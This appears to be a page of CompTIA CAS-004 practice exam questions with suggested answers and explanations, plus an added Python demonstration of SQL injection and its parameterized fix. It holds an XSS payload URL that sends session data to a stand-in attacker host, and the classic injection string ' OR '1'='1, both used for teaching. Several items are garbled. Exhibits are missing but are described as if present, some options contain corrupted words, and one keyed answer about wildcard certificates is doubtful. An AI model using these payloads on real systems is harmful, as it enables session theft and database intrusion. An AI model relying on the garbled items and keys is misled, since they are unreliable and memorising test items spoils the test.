CompTIA CAS-004 Practice Test - Questions Answers, Page 11

A company that uses AD is migrating services from LDAP to secure LDAP. During the pilot phase, services are not connecting properly to secure LDAP. Below is an excerpt of output from the troubleshooting session:

Which of the following BEST explains why secure LDAP is not working? (Select TWO.)

A. The clients may not trust idapt by default.
B. The secure LDAP service is not started, so no connections can be made.
C. Danvills.com is under a DDoS-inator attack and cannot respond to OCSP requests.
D. Secure LDAP should be running on UDP rather than TCP.
E. The company is using the wrong port. It should be using port 389 for secure LDAP.
F. Secure LDAP does not support wildcard certificates.
G. The clients may not trust Chicago by default.
Suggested answer: A, F

Explanation:

The clients may not trust idapt by default because it is a self-signed certificate authority that is not in the trusted root store of the clients. Secure LDAP does not support wildcard certificates because they do not match the fully qualified domain name of the server.

Reference: https://www.professormesser.com/security-plus/sy0-401/ldap-and-secure-ldap/, https://www.comptia.org/training/books/casp-cas-004-study-guide

A threat analyst notices the following URL while going through the HTTP logs.

http://www.safebrowsing~~~/search.asp?q=<script>x=newimage;x.src=”http://baddomain~~~/session;

Which of the following attack types is the threat analyst seeing?

A. SQL injection
B. CSRF
C. Session hijacking
D. XSS
Suggested answer: D

Explanation:

XSS stands for cross-site scripting, a type of attack that injects malicious code into a web page, which is then executed by the victim's browser. The URL in the question contains a script tag that tries to execute JavaScript code that sends data to an external host, which is a sign of XSS.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://owasp.org/www-community/attacks/xss/

The Chief Information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by those parties. Which of the following should be implemented to BEST manage the risk?

A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate design and operational controls into the contracts and a right-to-audit clause. Regularly assess the suppliers post-contract renewal with a dedicated risk management team.
B. Establish a team using members from first-line risk, the business unit, and vendor management to assess only the design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
C. Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data. Review all design and operational controls based on a best-practice standard and report the findings back to upper management.
D. Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data. Assign key controls that are reviewed and managed based on the supplier's rating. Report findings to the units that rely on the suppliers and to the various risk teams.
Suggested answer: D

Explanation:

A governance program that rates suppliers based on their access to data, the type of data, and how they access the data is the best way to manage the risk of third parties handling and securing customer data. This allows the company to assign key controls that are reviewed and managed based on each supplier's rating, and to report findings to the relevant units and risk teams.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/third-party-risk-management

Company A is establishing a contractual relationship with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements?

A. Company A-B SLA v2.docx
B. Company A OLA v1b.docx
C. Company A MSA v3.docx
D. Company A MOU v1.docx
E. Company A-B NDA v03.docx
Suggested answer: C

Explanation:

An MSA is a master service agreement, a document that covers the general terms and conditions of a contractual relationship between two parties. It usually includes payment terms, limitation of liability, intellectual property rights, dispute resolution, and other clauses that apply to all services provided by one party to the other.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.upcounsel.com/master-service-agreement

A company requires a task to be carried out by more than one person concurrently. This is an example of:

A. separation of duties
B. dual control
C. least privilege
D. job rotation
Suggested answer: B

Explanation:

Dual control is a security principle that requires two or more authorized individuals to perform a task concurrently. This reduces the risk of fraud, error, or misuse of sensitive assets or information.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/using-dual-control-to-mitigate-risk

A health company has reached the physical and computing capacity of its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare applications that process sensitive health and payment information. Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standards for virtualization and cloud computing?

A. Hybrid IaaS solution in a single-tenancy cloud
B. PaaS solution in a multitenancy cloud
C. SaaS solution in a community cloud
D. Private SaaS solution in a single-tenancy cloud
Suggested answer: A

Explanation:

A hybrid IaaS solution in a single-tenancy cloud is the best option for the company to meet the computing demand while complying with healthcare standards for virtualization and cloud computing. A hybrid IaaS solution allows the company to use both on-premises and cloud-based resources to scale up its capacity and performance. A single-tenancy cloud ensures that the company's data and applications are isolated from other customers and have dedicated resources and security controls.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.hhs.gov/hipaa/for-professionals/special-topics/cloud-computing/index.html

A developer implements the following code snippet.

Which of the following vulnerabilities does the code snippet resolve?

A. SQL injection
B. Buffer overflow
C. Missing session limit
D. Information leakage
Suggested answer: A

Explanation:

SQL injection is a type of vulnerability that allows an attacker to execute malicious SQL commands on a database by inserting them into an input field. The code snippet resolves this vulnerability by using parameterized queries, which bind the input as a value so it is never interpreted as part of the SQL command.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://owasp.org/www-community/attacks/SQL_Injection
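The question's own snippet is not reproduced on this page, so the following is an added example (not from the exam or the study guide) that places a string-built query beside its parameterized form, using a constructed in-memory SQLite table, to show why binding the input as a value prevents the injection:

```python
import sqlite3


def make_db():
    """Create a constructed in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """The 'before' form: the input is spliced into the SQL text, so quote
    characters in it change the structure of the statement."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, username):
    """The hardened form: the statement text is fixed and the input is bound
    as a parameter, so the database only ever treats it as a value."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def demo():
    """Run both lookups with a normal name and with a textbook payload."""
    conn = make_db()
    payload = "' OR '1'='1"  # turns the WHERE clause into a tautology
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "bob"),
        "normal_parameterized": lookup_parameterized(conn, "bob"),
        "payload_vulnerable": sorted(lookup_vulnerable(conn, payload)),
        "payload_parameterized": lookup_parameterized(conn, payload),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

With the payload the string-built query returns every row, while the parameterized query looks for a user literally named `' OR '1'='1` and returns nothing.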

A security analyst is investigating a series of suspicious emails reported by employees to the security team. The emails appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the messages by the security tools the company uses; instead, the emails only include the following in plain text.

Which of the following should the security analyst perform?

A. Contact the security department at the business partner and alert them to the email event.
B. Block the IP address for the business partner at the perimeter firewall.
C. Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
D. Configure the email gateway to automatically quarantine all messages originating from the business partner.
Suggested answer: A

Explanation:

The best option for the security analyst is to contact the security department at the business partner and alert them to the email event. The email appears to be a phishing attempt that tries to trick employees into revealing their login credentials by impersonating a legitimate sender. The security department at the business partner should be notified so they can investigate the source and scope of the attack and take appropriate action to protect their systems and users.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://us-cert.cisa.gov/ncas/tips/ST04-014

A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief Information Security Officer (CISO) must brief the board of directors on the potential security concerns related to this migration. The board is concerned about the following:

* Transactions being required by unauthorized individuals.

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attackers using email to distribute malware and ransomware.

* Exfiltration of sensitive company information.

The cloud-based email solution will provide anti-malware, reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the board's concerns for this email migration?

A. Data loss prevention
B. Endpoint detection response
C. SSL VPN
D. Application whitelisting
Suggested answer: A

Explanation:

Data loss prevention (DLP) is the best option to resolve the board's concerns for this email migration. DLP is a set of tools and policies that aim to prevent unauthorized access, disclosure, or exfiltration of sensitive data. DLP can monitor, filter, encrypt, or block email messages based on predefined rules and criteria such as content, sender, recipient, and attachments. DLP can help protect transactions, customer data, and company information from being compromised by malicious actors or accidental leaks.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://www.csoonline.com/article/3245746/what-is-dlp-data-loss-prevention-and-how-does-it-work.html

Which of the following BEST sets expectations between the security team and business units within an organization?

A. Risk assessment
B. Memorandum of understanding
C. Business impact analysis
D. Business partnership agreement
E. Service level agreement
Suggested answer: E

Explanation:

A service level agreement (SLA) is the best option to set expectations between the security team and business units within an organization. An SLA is a document that defines the scope, quality, roles, responsibilities, and metrics of a service provided by one party to another. An SLA can help align the security team's objectives and activities with the business units' needs and expectations, as well as establish accountability and communication channels.

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide, https://searchitchannel.techtarget.com/definition/service-level-agreement
